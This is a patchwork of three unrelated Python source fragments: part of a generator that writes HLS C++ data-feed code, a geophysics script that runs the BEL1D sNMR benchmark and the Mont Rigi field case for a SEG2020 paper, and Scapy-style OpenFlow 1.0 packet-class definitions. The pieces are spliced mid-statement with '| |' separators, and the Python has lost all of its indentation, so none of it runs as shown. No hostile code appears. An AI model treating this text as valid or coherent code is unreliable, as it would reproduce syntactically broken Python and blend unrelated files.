code.append(indent(9) + 'uint cin_bus_idx = cin_local_idx / %sDATA%d_PACK_FACTOR;\n' % (var_prefix, idx))
code.append(indent(9) + 'uint cin_bus_offset = cin_local_idx %% %sDATA%d_PACK_FACTOR;\n' % (var_prefix, idx))
code.append(indent(9) + '%sbus_t%d bus_data = cin_buf[cin_bus_idx];\n' % (var_prefix, idx))
code.append(indent(9) + 'ap_uint<%sDATA%d_WIDTH * %sDATA%d_FC_SIMD_FACTOR> fifo_cin_data;\n' % (var_prefix, idx, var_prefix, idx))
unroll_w = cal_width(desp['BUS_WIDTH'][idx] / desp['DATA_WIDTH'][idx] / desp['FC_SIMD_FACTOR'][idx])
code.append(indent(9) + 'for (ap_uint<' + str(unroll_w) + '> s = 0; s < ' + var_prefix + 'DATA' + str(idx) + '_PACK_FACTOR / ' + var_prefix + 'DATA' + str(idx) + '_FC_SIMD_FACTOR; s++){\n')
code.append('#pragma HLS UNROLL\n')
code.append(indent(10) + 'sel_tmp[s] = bus_data(' + var_prefix + 'DATA' + str(idx) + '_WIDTH * ' + var_prefix + 'DATA' + str(idx) + '_FC_SIMD_FACTOR - 1, 0);\n')
code.append(indent(10) + 'bus_data = bus_data >> (' + var_prefix + 'DATA' + str(idx) + '_WIDTH * ' + var_prefix + 'DATA' + str(idx) + '_FC_SIMD_FACTOR);\n')
code.append(indent(9) + '}\n')
code.append(indent(9) + 'fifo_cin_data = sel_tmp[cin_bus_offset / %sDATA%d_FC_SIMD_FACTOR];\n' % (var_prefix, idx))
code.append(indent(9) + 'fifo_transfer_cin.write(fifo_cin_data);\n')
code.append(indent(8) + '}\n')
code.append(indent(7) + '}\n')
code.append(indent(6) + '}\n')
code.append(indent(5) + '}\n')
code.append(indent(4) + '}\n')
code.append(indent(3) + '}\n')
code.append(indent(2) + '}\n')
code.append(indent(1) + '}\n')
code.append('}\n\n')
elif idx == 1:
code.append('void ' + var_prefix + 'DataFeed' + str(idx) + 'Head_Shim(\n')
code.append(indent(1) + var_prefix + 'bus_t' + str(idx) + '* ' + op_name + ',\n')
code.append(indent(1) + 'stream<ap_uint<' + var_prefix + 'DATA' + str(idx) + '_WIDTH * ' + var_prefix + 'DATA' + str(idx) + '_FC_SIMD_FACTOR> > &fifo_transfer_' + op_name + ',\n')
code.append(indent(1) + 'uint LAYER_IN_NUM,\n')
code.append(indent(1) + 'uint | |
'''
SEG2020 is a script that runs all the computations for the different results
presented at the SEG2020 conference (Houston, Texas).
***Improving BEL1D accuracy for geophysical imaging of the subsurface***
It first runs the numerical benchmark on a dataset that is created directly.
- Creating the dataset
- Running BEL1D (initialization + first iteration)
- Presenting graphs of the results
- Applying IPR
- Presenting graphs of the improved result
- Comparing to McMC results from DREAM (results provided in github)
Then it runs the same workflow for the Mont Rigi dataset and simply presents the obtained profile.
Author:
<NAME>
ULiège, UGent, F.R.S.-FNRS
hadrien[dot]michel[at]uliege[dot]be
(c) August 2020
'''
def round_to_5(x,n=1):
import math as mt
# Modified from: https://stackoverflow.com/questions/3410976/how-to-round-a-number-to-significant-figures-in-python
tmp = [(round(a, -int(mt.floor(mt.log10(abs(a)))) + (n-1)) if a != 0.0 else 0.0) for a in x]
return tmp
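# Example (verifiable by inspection): round_to_5([0.12345, 67.89], n=3)
# returns [0.123, 67.9] -- each entry is rounded to 3 significant figures,
# while exact zeros are passed through unchanged.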
if __name__=='__main__':
import numpy as np
from pyBEL1D import BEL1D
from pyBEL1D.utilities import Tools
from matplotlib import pyplot
from pathos import multiprocessing as mp
from pathos import pools as pp
import time
################################################################################
### ###
### Numerical Benchmarking ###
### ###
################################################################################
Benchmark = True
if Benchmark:
# 1) Creating the dataset:
from pygimli.physics import sNMR
KernelBench = "Data/sNMR/Tx50Rx50.mrsk" # A kernel file generated by MRSMatlab (Mueller-Petke et al., 2012)
nbLayer = 3 # 2 layers and a half-space
TimingBench = np.arange(0.005,0.5,0.001) # The time vector for the model
# KFile = sNMR.MRS()
# KFile.loadKernel(KernelBench)
# ModellingMethod = sNMR.MRS1dBlockQTModelling(nlay=nbLayer,K=KFile.K,zvec=KFile.z,t=TimingBench)
ModelBench = np.asarray([25, 25, 0.05, 0.25, 0.1, 0.1, 0.2, 0.05])
Noise = 10 # nV
# DatasetBench = ModellingMethod.response(ModelBench)
# DatasetBench += np.random.normal(loc=0, scale=Noise*1e-9,size=DatasetBench.shape) # Adding noise to the dataset
# np.save('sNMR_Bench_Dataset',DatasetBench)# To use in the McMC algorithm
DatasetBench = np.load('sNMR_Bench_Dataset.npy') # Load the dataset that was already created and run in McMC
# 2) Initializing BEL1D:
priorBench = np.array([[0.0, 50.0, 0.0, 0.15, 0.0, 0.5], [0.0, 50.0, 0.15, 0.50, 0.0, 0.5], [0.0, 0.0, 0.0, 0.15, 0.0, 0.5]])
# Initializing the parameters:
start = time.time()
ModelParam = BEL1D.MODELSET.SNMR(prior=priorBench, Kernel=KernelBench, Timing=TimingBench)
# 3) Running pre-BEL operations:
nbSampled = 10000
PreBEL_Bench = BEL1D.PREBEL(ModelParam,nbModels=nbSampled)
PreBEL_Bench.run()
# 4) Sampling 10000 models from the posterior:
PostBEL_Bench = BEL1D.POSTBEL(PreBEL_Bench)
PostBEL_Bench.run(Dataset=DatasetBench,nbSamples=nbSampled,NoiseModel=Noise)
end = time.time()
PostBEL_Bench.KDE.ShowKDE(Xvals=PostBEL_Bench.CCA.transform(PostBEL_Bench.PCA['Data'].transform(np.reshape(DatasetBench,(1,-1)))))
PostBEL_Bench.ShowDataset(RMSE=True)
CurrentGraph = pyplot.gcf()
CurrentGraph = CurrentGraph.get_axes()[0]
CurrentGraph.plot(TimingBench,DatasetBench[:len(TimingBench)],'k',linestyle='None',marker='o',markerfacecolor='None')
# Graph of the CCA-space parameter loadings
_, ax = pyplot.subplots()
B = PostBEL_Bench.CCA.y_loadings_
B = np.divide(np.abs(B).T,np.repeat(np.reshape(np.sum(np.abs(B),axis=0),(1,B.shape[0])),B.shape[0],axis=0).T)
ind = np.asarray(range(B.shape[0]))+1
ax.bar(x=ind,height=B[0],label=r'${}$'.format(PostBEL_Bench.MODPARAM.paramNames["NamesSU"][0]))
for i in range(B.shape[0]+1)[1:-1]:
ax.bar(x=ind,height=B[i],bottom=np.reshape(np.sum(B[0:i],axis=0),(B.shape[0],)),label=r'${}$'.format(PostBEL_Bench.MODPARAM.paramNames["NamesSU"][i]))
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width, box.height*0.8])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.4), ncol=3)
ax.set_ylabel('Relative contribution')
ax.set_xlabel('CCA dimension')
pyplot.show(block=False)
PostBEL_Bench.ShowPostModels(TrueModel=ModelBench,RMSE=True)
PostBEL_Bench.ShowPostCorr(TrueModel=ModelBench)
pyplot.show(block=False)
MODELS_1stITER = PostBEL_Bench.SAMPLES
MODELS_1stITER_DATA = PostBEL_Bench.SAMPLESDATA
PRE_MODS = PreBEL_Bench.MODELS
PRE_DATA = PreBEL_Bench.FORWARD
Postbel = PostBEL_Bench
Prebel = PreBEL_Bench
# 5) Applying IPR
nbIter = 100 # maximum number of iterations
tolerance = 5e-3 # Tolerance on the normalized difference between the distributions
nbParam = int(priorBench.size/2 - 1)
means = np.zeros((nbIter,nbParam))
stds = np.zeros((nbIter,nbParam))
timings = np.zeros((nbIter,))
MODELS_ITER = np.zeros((nbIter,nbSampled,nbParam)) # Store the models that have been computed
diverge = True
distancePrevious = 1e10
MixingUpper = 0
MixingLower = 1
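# The mixing ratio below ramps as 1/2, 2/3, 3/4, ... over the iterations
# (both counters are incremented before each use); how that ratio weights the
# prior versus the resampled posterior models is decided inside POSTBEL2PREBEL.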
for idxIter in range(nbIter):
PostbelLast = Postbel
PrebelLast = Prebel
if idxIter == 0: # Initialization: already done (see 2 and 3)
# PostbelTest.KDE.ShowKDE(Xvals=PostbelTest.CCA.transform(PostbelTest.PCA['Data'].transform(np.reshape(Dataset,(1,-1)))))
means[idxIter,:], stds[idxIter,:] = Postbel.GetStats()
timings[idxIter] = end-start
ModLastIter = Prebel.MODELS
else:
ModLastIter = Postbel.SAMPLES
# Here, we will use the POSTBEL2PREBEL function that adds the POSTBEL from previous iteration to the prior (Iterative prior resampling)
# However, the computations take longer with a lot of models, so you can opt in to the "simplified" option, which randomly selects up to 10 times the number of models
MixingUpper += 1
MixingLower += 1
Mixing = MixingUpper/MixingLower
Prebel = BEL1D.PREBEL.POSTBEL2PREBEL(PREBEL=Prebel,POSTBEL=Postbel,Dataset=DatasetBench,NoiseModel=Noise,Simplified=True,nbMax=nbSampled,MixingRatio=Mixing)
# Since the dataset is known when iterating, we do not compute the full relationship but only the posterior distributions directly, to save computation time
print(idxIter+1)
Postbel = BEL1D.POSTBEL(Prebel)
Postbel.run(DatasetBench,nbSamples=nbSampled,NoiseModel=None)
means[idxIter,:], stds[idxIter,:] = Postbel.GetStats()
end = time.time()
timings[idxIter] = end-start
# The distance is computed on the normalized distributions. Therefore, the tolerance is relative.
diverge, distance = Tools.ConvergeTest(SamplesA=ModLastIter,SamplesB=Postbel.SAMPLES, tol=tolerance)
print('Wasserstein distance: {}'.format(distance))
if not(diverge) or (abs((distancePrevious-distance)/distancePrevious)*100<1):# If the distance between the distributions is not changing, we converged as well
# Convergence achieved if:
# 1) Distance below threshold
# 2) Distance does not vary significantly (less than 1%)
print('Model has converged at iter {}!'.format(idxIter+1))
MODELS_ITER[idxIter,:,:] = Postbel.SAMPLES
break
distancePrevious = distance
MODELS_ITER[idxIter,:,:] = Postbel.SAMPLES
start = time.time()
timings = timings[:idxIter+1]
means = means[:idxIter+1,:]
stds = stds[:idxIter+1,:]
MODELS_ITER = MODELS_ITER[:idxIter+1,:,:]
np.save('ModelsIteration',MODELS_ITER)
# 6) Graphs for the results:
Postbel.ShowDataset(RMSE=True)
CurrentGraph = pyplot.gcf()
CurrentGraph = CurrentGraph.get_axes()[0]
CurrentGraph.plot(TimingBench,DatasetBench[:len(TimingBench)],'k',linestyle='None',marker='o',markerfacecolor='None')
#Postbel.ShowPostCorr(TrueModel=ModelBench,OtherMethod=PRE_MODS)
Postbel.ShowPostModels(TrueModel=ModelBench,RMSE=True)
# Graph of the CCA-space parameter loadings
_, ax = pyplot.subplots()
B = Postbel.CCA.y_loadings_
B = np.divide(np.abs(B).T,np.repeat(np.reshape(np.sum(np.abs(B),axis=0),(1,B.shape[0])),B.shape[0],axis=0).T)
ind = np.asarray(range(B.shape[0]))+1
ax.bar(x=ind,height=B[0],label=r'${}$'.format(Postbel.MODPARAM.paramNames["NamesSU"][0]))
for i in range(B.shape[0]+1)[1:-1]:
ax.bar(x=ind,height=B[i],bottom=np.reshape(np.sum(B[0:i],axis=0),(B.shape[0],)),label=r'${}$'.format(Postbel.MODPARAM.paramNames["NamesSU"][i]))
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width, box.height*0.8])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.4), ncol=3)
ax.set_ylabel('Relative contribution')
ax.set_xlabel('CCA dimension')
pyplot.show(block=False)
# Add KDE graph at last iteration:
PrebelGraph = BEL1D.PREBEL.POSTBEL2PREBEL(PREBEL=PrebelLast,POSTBEL=PostbelLast, NoiseModel=Noise,RemoveOutlier=True,Simplified=True,nbMax=nbSampled,MixingRatio=Mixing)
PostbelGraph = BEL1D.POSTBEL(PREBEL=PrebelGraph)
print('Postbel for graphs initialized')
PostbelGraph.run(Dataset=DatasetBench, nbSamples=10000)
print('Printing KDE Graphs')
PostbelGraph.KDE.ShowKDE(Xvals=PostbelGraph.CCA.transform(PostbelGraph.PCA['Data'].transform(np.reshape(DatasetBench,(1,-1)))))
print('Total computation time: {} seconds'.format(np.sum(timings)))
# Comparison with McMC:
OtherMethod = np.load('Data/sNMR/SEG2020_Bench.npy')
fig = pyplot.figure(figsize=[10,10])# Creates the figure space
axs = fig.subplots(nbParam, nbParam)
for i in range(nbParam):
for j in range(nbParam):
if i == j: # Diagonal
if i != nbParam-1:
axs[i,j].get_shared_x_axes().join(axs[i,j],axs[-1,j])# Set the xaxis limit
axs[i,j].hist(np.squeeze(MODELS_ITER[0,:,j]),color='gray',density=True,alpha=0.5)
axs[i,j].hist(np.squeeze(MODELS_ITER[3,:,j]),color='b',density=True,alpha=0.5)
axs[i,j].hist(np.squeeze(MODELS_ITER[6,:,j]),color='m',density=True,alpha=0.5)
axs[i,j].hist(OtherMethod[:,j],color='y',density=True,alpha=0.5)
axs[i,j].hist(np.squeeze(MODELS_ITER[-1,:,j]),color='g',density=True,alpha=0.5)
axs[i,j].plot([ModelBench[i],ModelBench[i]],np.asarray(axs[i,j].get_ylim()),'r')
if nbParam > 8:
axs[i,j].set_xticks([])
axs[i,j].set_yticks([])
elif i > j: # Below the diagonal -> Scatter plot
if i != nbParam-1:
axs[i,j].get_shared_x_axes().join(axs[i,j],axs[-1,j])# Set the xaxis limit
if j != nbParam-1:
if i != nbParam-1:
axs[i,j].get_shared_y_axes().join(axs[i,j],axs[i,-1])# Set the yaxis limit
else:
axs[i,j].get_shared_y_axes().join(axs[i,j],axs[i,-2])# Set the yaxis limit
axs[i,j].plot(np.squeeze(MODELS_ITER[0,:,j]),np.squeeze(MODELS_ITER[0,:,i]),color='gray',linestyle='None',marker='.')
axs[i,j].plot(np.squeeze(MODELS_ITER[3,:,j]),np.squeeze(MODELS_ITER[3,:,i]),'.b')
axs[i,j].plot(np.squeeze(MODELS_ITER[6,:,j]),np.squeeze(MODELS_ITER[6,:,i]),'.m')
axs[i,j].plot(np.squeeze(MODELS_ITER[-1,:,j]),np.squeeze(MODELS_ITER[-1,:,i]),'.g')
axs[i,j].plot(ModelBench[j],ModelBench[i],'.r')
if nbParam > 8:
axs[i,j].set_xticks([])
axs[i,j].set_yticks([])
elif OtherMethod is not None:
if i != nbParam-1:
axs[i,j].get_shared_x_axes().join(axs[i,j],axs[-1,j])# Set the xaxis limit
if j != nbParam-1:
if i != 0:
axs[i,j].get_shared_y_axes().join(axs[i,j],axs[i,-1])# Set the yaxis limit
else:
axs[i,j].get_shared_y_axes().join(axs[i,j],axs[i,-2])# Set the yaxis limit
axs[i,j].plot(np.squeeze(MODELS_ITER[0,:,j]),np.squeeze(MODELS_ITER[0,:,i]),color='gray',linestyle='None',marker='.')
axs[i,j].plot(OtherMethod[:,j],OtherMethod[:,i],'.y')
axs[i,j].plot(ModelBench[j],ModelBench[i],'.r')
if nbParam > 8:
axs[i,j].set_xticks([])
axs[i,j].set_yticks([])
else:
axs[i,j].set_visible(False)
if j == 0: # First column of the graph
if ((i==0)and(j==0)) or not(i==j):
axs[i,j].set_ylabel(r'${}$'.format(Postbel.MODPARAM.paramNames["NamesSU"][i]))
if i == nbParam-1: # Last line of the graph
axs[i,j].set_xlabel(r'${}$'.format(Postbel.MODPARAM.paramNames["NamesSU"][j]))
if j == nbParam-1:
if not(i==j):
axs[i,j].yaxis.set_label_position("right")
axs[i,j].yaxis.tick_right()
axs[i,j].set_ylabel(r'${}$'.format(Postbel.MODPARAM.paramNames["NamesSU"][i]))
if i == 0:
axs[i,j].xaxis.set_label_position("top")
axs[i,j].xaxis.tick_top()
axs[i,j].set_xlabel(r'${}$'.format(Postbel.MODPARAM.paramNames["NamesSU"][j]))
fig.suptitle("Posterior model space visualization")
from matplotlib.lines import Line2D
custom_lines = [Line2D([0], [0], color='gray', lw=4),
Line2D([0], [0], color='y', lw=4),
Line2D([0], [0], color='b', lw=4),
Line2D([0], [0], color='m', lw=4),
Line2D([0], [0], color='g', lw=4),
Line2D([0], [0], color='r', lw=4)]
fig.legend(custom_lines, ['Prior', 'DREAM', '3rd Iteration', '6th Iteration', 'Last Iteration', 'Benchmark'],loc='lower center',ncol=6)
for ax in axs.flat:
ax.label_outer()
pyplot.show(block=False)
# Graph with the models:
DREAM = OtherMethod # Already loaded
Prior = PRE_MODS
Iter5 = np.squeeze(MODELS_ITER[3,:,:])
Iter10 = np.squeeze(MODELS_ITER[6,:,:])
IterLast = np.squeeze(MODELS_ITER[-1,:,:])
pltidx = [1,4,2,5,8,3,6,9]
fig = pyplot.figure(figsize=[10,10])
for idx in range(8):
ax = pyplot.subplot(3,3,pltidx[idx])
pyplot.hist(Prior[:,idx].ravel(),bins=50,density=True,alpha=0.5,label='Prior')
pyplot.hist(Iter5[:,idx].ravel(),bins=50,density=True,alpha=0.5,label='3rd iteration')
pyplot.hist(Iter10[:,idx].ravel(),bins=50,density=True,alpha=0.5,label='6th iteration')
pyplot.hist(IterLast[:,idx].ravel(),bins=50,density=True,alpha=0.5,label='Last iteration')
pyplot.hist(DREAM[:,idx].ravel(),bins=50,density=True,alpha=0.5,label='DREAM')
ax.plot([ModelBench[idx],ModelBench[idx]],np.asarray(ax.get_ylim()),label='Benchmark')
pyplot.plot()
if pltidx[idx]==1:
ax.set_ylabel('Layer 1')
elif pltidx[idx]==4:
ax.set_ylabel('Layer 2')
elif pltidx[idx]==8:
ax.set_xlabel('Water content [/]')
elif pltidx[idx]==9:
ax.set_xlabel('Relaxation time [sec]')
handles, labels = ax.get_legend_handles_labels()
ax = pyplot.subplot(3,3,7)# Not used but labels needed
ax.set_xlabel('Thickness [m]')
ax.set_ylabel('Half-space')
ax.spines['bottom'].set_color('None')
ax.spines['top'].set_color('None')
ax.spines['right'].set_color('None')
ax.spines['left'].set_color('None')
ax.xaxis.set_ticks([])
ax.yaxis.set_ticks([])
#pyplot.axis('off')
CurrentGraph = pyplot.gcf()
CurrentGraph.legend(handles, labels,loc='lower center', ncol=6)
# Graph for the i-th pulse moment:
import matplotlib
from matplotlib import colors
from scipy import stats
RMS = np.sqrt(np.square(np.subtract(DatasetBench,Postbel.SAMPLESDATA)).mean(axis=-1))
quantiles = np.divide([stats.percentileofscore(RMS,a,'strict') for a in RMS],100)
sortIndex = np.argsort(RMS)
sortIndex = np.flip(sortIndex)
fig = pyplot.figure()
ax = fig.add_subplot(1, 1, 1)
colormap = matplotlib.cm.get_cmap('jet')
for j in sortIndex:
ax.plot(Postbel.MODPARAM.forwardFun["Axis"],np.squeeze(Postbel.SAMPLESDATA[j,-5*len(Postbel.MODPARAM.forwardFun["Axis"]):-4*len(Postbel.MODPARAM.forwardFun["Axis"])]),color=colormap(quantiles[j]))
ax.plot(TimingBench,DatasetBench[-5*len(Postbel.MODPARAM.forwardFun["Axis"]):-4*len(Postbel.MODPARAM.forwardFun["Axis"])],'k',linestyle='None',marker='o',markerfacecolor='None')
ax.set_xlabel(r'${}$'.format(Postbel.MODPARAM.paramNames["DataAxis"]),fontsize=14)
ax.set_ylabel(r'${}$'.format(Postbel.MODPARAM.paramNames["DataName"]),fontsize=14)
fig.subplots_adjust(bottom=0.30)
ax_colorbar = fig.add_axes([0.10, 0.15, 0.80, 0.05])
nb_inter = 1000
color_for_scale = colormap(np.linspace(0,1,nb_inter,endpoint=True))
cmap_scale = colors.ListedColormap(color_for_scale)
scale = [stats.scoreatpercentile(RMS,a,limit=(np.min(RMS),np.max(RMS)),interpolation_method='lower') for a in np.linspace(0,100,nb_inter,endpoint=True)]
norm = colors.BoundaryNorm(scale,len(color_for_scale))
data = np.atleast_2d(np.linspace(np.min(RMS),np.max(RMS),nb_inter,endpoint=True))
ax_colorbar.imshow(data, aspect='auto',cmap=cmap_scale,norm=norm)
ax_colorbar.set_xlabel('Root Mean Square Error {}'.format(Postbel.MODPARAM.paramNames["DataUnits"]),fontsize=12)
ax_colorbar.yaxis.set_visible(False)
nbTicks = 5
ax_colorbar.set_xticks(ticks=np.linspace(0,nb_inter,nbTicks,endpoint=True))
ax_colorbar.set_xticklabels(labels=round_to_5([stats.scoreatpercentile(RMS,a,limit=(np.min(RMS),np.max(RMS)),interpolation_method='lower') for a in np.linspace(0,100,nbTicks,endpoint=True)],n=5),rotation=15,ha='center')
pyplot.show()
################################################################################
### ###
###                   Case study: Mont Rigi                  ###
### ###
################################################################################
MtRigi = False
if MtRigi:
# Load the field data
from pygimli.physics import sNMR
Dataset = "Data/sNMR/SEG2020_MtRigi.mrsd"
Kernel = "Data/sNMR/SEG2020_MtRigi.mrsk"
ModelParam = sNMR.MRS()
sNMR.MRS.loadKernel(ModelParam,Kernel)
sNMR.MRS.loadMRSI(ModelParam,Dataset)
FieldData = np.ravel(ModelParam.dcube)
TimingField = ModelParam.t
Noise = 18 | |
1: "OFPT_ERROR",
2: "OFPT_ECHO_REQUEST",
3: "OFPT_ECHO_REPLY",
4: "OFPT_VENDOR",
5: "OFPT_FEATURES_REQUEST",
6: "OFPT_FEATURES_REPLY",
7: "OFPT_GET_CONFIG_REQUEST",
8: "OFPT_GET_CONFIG_REPLY",
9: "OFPT_SET_CONFIG",
10: "OFPT_PACKET_IN",
11: "OFPT_FLOW_REMOVED",
12: "OFPT_PORT_STATUS",
13: "OFPT_PACKET_OUT",
14: "OFPT_FLOW_MOD",
15: "OFPT_PORT_MOD",
16: "OFPT_STATS_REQUEST",
17: "OFPT_STATS_REPLY",
18: "OFPT_BARRIER_REQUEST",
19: "OFPT_BARRIER_REPLY",
20: "OFPT_QUEUE_GET_CONFIG_REQUEST",
21: "OFPT_QUEUE_GET_CONFIG_REPLY" }
class OFPTHello(_ofp_header):
name = "OFPT_HELLO"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 0, ofp_type),
ShortField("len", None),
IntField("xid", 0) ]
overload_fields = {TCP: {"sport": 6653}}
#####################################################
#################### OFPT_ERROR #####################
#####################################################
### this class will be used to display some messages
### sent back by the switch after an error
class OFPacketField(PacketField):
def getfield(self, pkt, s):
try:
l = s[2:4]
l = struct.unpack("!H", l)[0]
ofload = s[:l]
remain = s[l:]
return remain, OpenFlow(None, ofload)(ofload)
except:
return "", Raw(s)
ofp_error_type = { 0: "OFPET_HELLO_FAILED",
1: "OFPET_BAD_REQUEST",
2: "OFPET_BAD_ACTION",
3: "OFPET_FLOW_MOD_FAILED",
4: "OFPET_PORT_MOD_FAILED",
5: "OFPET_QUEUE_OP_FAILED" }
class OFPETHelloFailed(_ofp_header):
name = "OFPET_HELLO_FAILED"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 1, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("errtype", 0, ofp_error_type),
ShortEnumField("errcode", 0, { 0: "OFPHFC_INCOMPATIBLE",
1: "OFPHFC_EPERM" }),
OFPacketField("data", "", Raw) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPETBadRequest(_ofp_header):
name = "OFPET_BAD_REQUEST"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 1, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("errtype", 1, ofp_error_type),
ShortEnumField("errcode", 0, { 0: "OFPBRC_BAD_VERSION",
1: "OFPBRC_BAD_TYPE",
2: "OFPBRC_BAD_STAT",
3: "OFPBRC_BAD_VENDOR",
4: "OFPBRC_BAD_SUBTYPE",
5: "OFPBRC_EPERM",
6: "OFPBRC_BAD_LEN",
7: "OFPBRC_BUFFER_EMPTY",
8: "OFPBRC_BUFFER_UNKNOWN" }),
OFPacketField("data", "", Raw) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPETBadAction(_ofp_header):
name = "OFPET_BAD_ACTION"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 1, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("errtype", 2, ofp_error_type),
ShortEnumField("errcode", 0, { 0: "OFPBAC_BAD_TYPE",
1: "OFPBAC_BAD_LEN",
2: "OFPBAC_BAD_VENDOR",
3: "OFPBAC_BAD_VENDOR_TYPE",
4: "OFPBAC_BAD_OUT_PORT",
5: "OFPBAC_BAD_ARGUMENT",
6: "OFPBAC_EPERM",
7: "OFPBAC_TOO_MANY",
8: "OFPBAC_BAD_QUEUE" }),
OFPacketField("data", "", Raw) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPETFlowModFailed(_ofp_header):
name = "OFPET_FLOW_MOD_FAILED"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 1, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("errtype", 3, ofp_error_type),
ShortEnumField("errcode", 0, { 0: "OFPFMFC_ALL_TABLES_FULL",
1: "OFPFMFC_OVERLAP",
2: "OFPFMFC_EPERM",
3: "OFPFMFC_BAD_EMERG_TIMEOUT",
4: "OFPFMFC_BAD_COMMAND",
5: "OFPFMFC_UNSUPPORTED" }),
OFPacketField("data", "", Raw) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPETPortModFailed(_ofp_header):
name = "OFPET_PORT_MOD_FAILED"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 1, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("errtype", 4, ofp_error_type),
ShortEnumField("errcode", 0, { 0: "OFPPMFC_BAD_PORT",
1: "OFPPMFC_BAD_HW_ADDR" }),
OFPacketField("data", "", Raw) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPETQueueOpFailed(_ofp_header):
name = "OFPET_QUEUE_OP_FAILED"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 1, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("errtype", 5, ofp_error_type),
ShortEnumField("errcode", 0, { 0: "OFPQOFC_BAD_PORT",
1: "OFPQOFC_BAD_QUEUE",
2: "OFPQOFC_EPERM" }),
OFPacketField("data", "", Raw) ]
overload_fields = {TCP: {"dport": 6653}}
# ofp_error_cls allows generic method OpenFlow() to choose the right class for dissection
ofp_error_cls = { 0: OFPETHelloFailed,
1: OFPETBadRequest,
2: OFPETBadAction,
3: OFPETFlowModFailed,
4: OFPETPortModFailed,
5: OFPETQueueOpFailed }
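# Sketch of how this table is meant to be used (the OpenFlow() dispatcher is
# defined elsewhere in this module): when a message of type OFPT_ERROR is
# dissected, the 2-byte errtype field is read from the payload and
# ofp_error_cls[errtype] selects the matching class above,
# e.g. errtype 3 -> OFPETFlowModFailed.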
################ end of OFPT_ERRORS #################
class OFPTEchoRequest(_ofp_header):
name = "OFPT_ECHO_REQUEST"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 2, ofp_type),
ShortField("len", None),
IntField("xid", 0) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTEchoReply(_ofp_header):
name = "OFPT_ECHO_REPLY"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 3, ofp_type),
ShortField("len", None),
IntField("xid", 0) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTVendor(_ofp_header):
name = "OFPT_VENDOR"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 4, ofp_type),
ShortField("len", None),
IntField("xid", 0),
IntField("vendor", 0) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTFeaturesRequest(_ofp_header):
name = "OFPT_FEATURES_REQUEST"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 5, ofp_type),
ShortField("len", None),
IntField("xid", 0) ]
overload_fields = {TCP: {"sport": 6653}}
ofp_action_types_flags = ofp_action_types.values()[:-1] # no ofpat_vendor flag
class OFPTFeaturesReply(_ofp_header):
name = "OFPT_FEATURES_REPLY"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 6, ofp_type),
ShortField("len", None),
IntField("xid", 0),
LongField("datapath_id", 0),
IntField("n_buffers", 0),
ByteField("n_tables", 1),
X3BytesField("pad", 0),
FlagsField("capabilities", 0, 32, [ "FLOW_STATS",
"TABLE_STATS",
"PORT_STATS",
"STP",
"RESERVED",
"IP_REASM",
"QUEUE_STATS",
"ARP_MATCH_IP" ]),
FlagsField("actions", 0, 32, ofp_action_types_flags),
PacketListField("ports", None, OFPPhyPort,
length_from=lambda pkt:pkt.len-32) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPTGetConfigRequest(_ofp_header):
name = "OFPT_GET_CONFIG_REQUEST"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 7, ofp_type),
ShortField("len", None),
IntField("xid", 0) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTGetConfigReply(_ofp_header):
name = "OFPT_GET_CONFIG_REPLY"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 8, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("flags", 0, { 0: "FRAG_NORMAL",
1: "FRAG_DROP",
2: "FRAG_REASM",
3: "FRAG_MASK" }),
ShortField("miss_send_len", 0) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPTSetConfig(_ofp_header):
name = "OFPT_SET_CONFIG"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 9, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("flags", 0, { 0: "FRAG_NORMAL",
1: "FRAG_DROP",
2: "FRAG_REASM",
3: "FRAG_MASK" }),
ShortField("miss_send_len", 128) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTPacketIn(_ofp_header):
name = "OFPT_PACKET_IN"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 10, ofp_type),
ShortField("len", None),
IntField("xid", 0),
IntEnumField("buffer_id", "NO_BUFFER", ofp_buffer),
ShortField("total_len", 0),
ShortEnumField("in_port", 0, ofp_port_no),
ByteEnumField("reason", 0, { 0: "OFPR_NO_MATCH",
1: "OFPR_ACTION" }),
XByteField("pad", 0),
PacketField("data", None, Ether) ]
overload_fields = {TCP: {"dport": 6653}}
